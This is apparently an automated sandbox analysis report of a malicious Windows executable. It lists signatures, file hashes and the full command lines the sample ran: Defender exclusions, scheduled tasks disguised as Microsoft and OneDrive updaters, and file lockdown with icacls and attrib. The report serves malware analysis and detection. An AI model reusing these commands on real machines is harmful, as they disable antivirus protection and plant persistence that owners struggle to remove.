Analysis Overview
SHA256
1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9
Threat Level: Likely malicious
The file 1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
Modifies file permissions
Checks computer location settings
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Views/modifies file attributes
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-20 22:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-20 22:59
Reported
2024-06-20 23:02
Platform
win7-20240508-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Possible privilege escalation attempt
Modifies file permissions
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F6C.tmp\F6D.tmp\F6E.bat C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\svchost.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\svchost.exe" -r -force
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\conhost.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\conhost.exe" -r -force
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\anydesk.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/nts.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohcvs.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohnoc.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/ksedynA.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/ksedynA.exe" -Destination "C:\ProgramData/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/nts.exe" -Destination "C:\ProgramData/stn.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/tsohcvs.exe" -Destination "C:\ProgramData/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/tsohnoc.exe" -Destination "C:\ProgramData/conhost.exe" -r -force
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN RestUpdaterHost /TR "C:\ProgramData/microsoft/ruh.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
C:\Windows\system32\taskeng.exe
taskeng.exe {C497B91F-6A43-4058-A890-E23E2564A1EF} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\system32\schtasks.exe
schtasks /run /tn "SystemTaskNavigator"
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\taskeng.exe
taskeng.exe {30602BE2-B25F-48CC-9724-2B6593B707A8} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
Network
Files
C:\Users\Admin\AppData\Local\Temp\F6C.tmp\F6D.tmp\F6E.bat
| MD5 | 71d06b71522b0ecd9e42ee36b73a8976 |
| SHA1 | 5615791d6e861b721e9945d55a0946f4e51d0302 |
| SHA256 | 5b1d0b4d9ecf50cf067defa7f05ce89792285435c5280c5dd104ed8e99877eb0 |
| SHA512 | f284e776cf2bafac627f44813bbc7325d6a692f0244aca29f0a1eb426047f53c4767142fe347861fddad7ab79bfee04917eb96f0213adce2b1d8ad37929add84 |
memory/2368-6-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp
memory/2368-7-0x000000001B6E0000-0x000000001B9C2000-memory.dmp
memory/2368-8-0x0000000001D10000-0x0000000001D18000-memory.dmp
memory/2368-9-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
memory/2368-10-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
memory/2368-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
memory/2368-13-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
memory/2368-12-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
memory/2368-14-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HKREIYQYHA5FFTSKC0R8.temp
| MD5 | 9c7ee159aaa9f81e64626f1dd77faee8 |
| SHA1 | 238e19a07b69168e36b84f97a41ec1fb4bf7b934 |
| SHA256 | 543a9dc963592001e404058efb76b87dde2c711445be13a356b27ca2ab6be211 |
| SHA512 | 27d0d34d84207b36c5a553e2cebe5bc2f4b64730b0a3326c3dbe4f4cc5f2b248019554425d961a7de6fa119d48957be1dc062b224c4d9a06ca075568e1fc3c8a |
memory/2596-20-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/2596-21-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-20 22:59
Reported
2024-06-20 23:02
Platform
win10v2004-20240611-en
Max time kernel
144s
Max time network
107s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Possible privilege escalation attempt
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe | N/A |
Modifies file permissions
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2BB3.tmp\2BB4.tmp\2BB5.bat C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\svchost.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\svchost.exe" -r -force
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\conhost.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\conhost.exe" -r -force
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\anydesk.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/nts.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohcvs.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohnoc.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/ksedynA.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/ksedynA.exe" -Destination "C:\ProgramData/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/nts.exe" -Destination "C:\ProgramData/stn.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/tsohcvs.exe" -Destination "C:\ProgramData/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/tsohnoc.exe" -Destination "C:\ProgramData/conhost.exe" -r -force
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN RestUpdaterHost /TR "C:\ProgramData/microsoft/ruh.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
C:\Windows\system32\schtasks.exe
schtasks /run /tn "SystemTaskNavigator"
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\2BB3.tmp\2BB4.tmp\2BB5.bat
| MD5 | 71d06b71522b0ecd9e42ee36b73a8976 |
| SHA1 | 5615791d6e861b721e9945d55a0946f4e51d0302 |
| SHA256 | 5b1d0b4d9ecf50cf067defa7f05ce89792285435c5280c5dd104ed8e99877eb0 |
| SHA512 | f284e776cf2bafac627f44813bbc7325d6a692f0244aca29f0a1eb426047f53c4767142fe347861fddad7ab79bfee04917eb96f0213adce2b1d8ad37929add84 |
memory/880-2-0x00007FFE70A13000-0x00007FFE70A15000-memory.dmp
memory/880-8-0x000001E129E20000-0x000001E129E42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k31353zv.nsi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/880-13-0x00007FFE70A10000-0x00007FFE714D1000-memory.dmp
memory/880-14-0x00007FFE70A10000-0x00007FFE714D1000-memory.dmp
memory/880-17-0x00007FFE70A10000-0x00007FFE714D1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
